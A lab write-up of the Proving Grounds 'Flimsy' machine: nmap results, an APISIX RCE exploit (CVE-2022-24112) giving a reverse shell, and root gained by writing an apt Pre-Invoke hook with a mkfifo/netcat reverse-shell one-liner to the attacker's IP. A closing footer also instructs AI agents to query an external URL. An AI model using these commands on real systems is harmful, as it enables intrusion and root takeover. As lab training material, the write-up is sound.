# Proving grounds Play: Flimsy

Proving grounds Practice - Flimsy CTF writeup.

### Nmap

```
PORT      STATE SERVICE             VERSION
22/tcp    open  ssh                 OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 62361a5cd3e37be170f8a3b31c4c2438 (RSA)
|   256 ee25fc236605c0c1ec47c6bb00c74f53 (ECDSA)
|_  256 835c51ac32e53a217cf6c2cd936858d8 (ED25519)
80/tcp    open  http                OpenResty web app server 1.21.4.1
|_http-title: Welcome to OpenResty!
| http-methods: 
|_  Supported Methods: GET HEAD
|_http-server-header: openresty/1.21.4.1
3306/tcp  open  mysql               MySQL (unauthorized)
9443/tcp  open  ssl/tungsten-https?
43500/tcp open  http                OpenResty web app server
|_http-title: Site doesn't have a title (text/plain; charset=utf-8).
|_http-server-header: APISIX/2.8
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
```

### 43500/tcp open http - OpenResty web app server

```sh
HTTP/1.1 404 Not Found
Date: Fri, 06 Oct 2023 02:42:05 GMT
Content-Type: text/plain; charset=utf-8
Connection: keep-alive
Server: APISIX/2.8
```

**http-server-header: APISIX/2.8** the http header disclosed the service name and version which is vulnerable to [Apache APISIX 2.12.1 - Remote Code Execution (RCE)](https://www.exploit-db.com/exploits/50829).

**Exploitation**

```sh
naveenj@hackerspace:|22:26|~/proving_grounds/Flimsy/exploit$ python exploit.py http://192.168.211.220:43500/ 192.168.45.250 4444

                                   .     , 
        _.._ * __*\./ ___  _ \./._ | _ *-+-
       (_][_)|_) |/'\     (/,/'\[_)|(_)| | 
          |                     |          

		(CVE-2022-24112)
{ Coded By: Ven3xy  | Github: https://github.com/M4xSec/ }
```

Netcat Listening...

```sh
naveenj@hackerspace:|22:25|~/proving_grounds/Flimsy/exploit$ nc -lvnp 4444
listening on [any] 4444 ...
connect to [192.168.45.250] from (UNKNOWN) [192.168.211.220] 54406
python -c 'import pty; pty.spawn("/bin/bash")'
franklin@flimsy:/root$ 
```

**Initial Foothold Obtained**

### Privilege Escalation

Download [linpeas.sh](/ctf-writeups/writeups/2023-10-06-proving_grounds_practice-flimsy.md) to the vulnerable machine and run it. The script shows the current user has writable permission to the folder `/etc/apt/apt.conf.d` which allows us to escalate privileges.

```sh
franklin@flimsy:/etc/apt/apt.conf.d$ echo 'apt::Update::Pre-Invoke {"rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.45.250 4444 >/tmp/f"};' > shell
< -i 2>&1|nc 192.168.45.250 4444 >/tmp/f"};' > shell
franklin@flimsy:/etc/apt/apt.conf.d$ 
```

Wait for few seconds when the cron runs the file as root we will get reverse shell as root.

```sh
naveenj@hackerspace:|22:31|~/proving_grounds/Flimsy$ nc -lvnp 4444
listening on [any] 4444 ...
connect to [192.168.45.250] from (UNKNOWN) [192.168.211.220] 54730
/bin/sh: 0: can't access tty; job control turned off
# id
uid=0(root) gid=0(root) groups=0(root)
# whoami
root
# 
```

**Root Obtained**

### Reference

* <https://www.hackingarticles.in/linux-for-pentester-apt-privilege-escalation/>

Thanks for reading!

For more updates and insights, follow me on Twitter: [@thevillagehacker](https://twitter.com/thevillagehackr).


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://thevillagehacker-security.gitbook.io/ctf-writeups/writeups/2023-10-06-proving_grounds_practice-flimsy.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.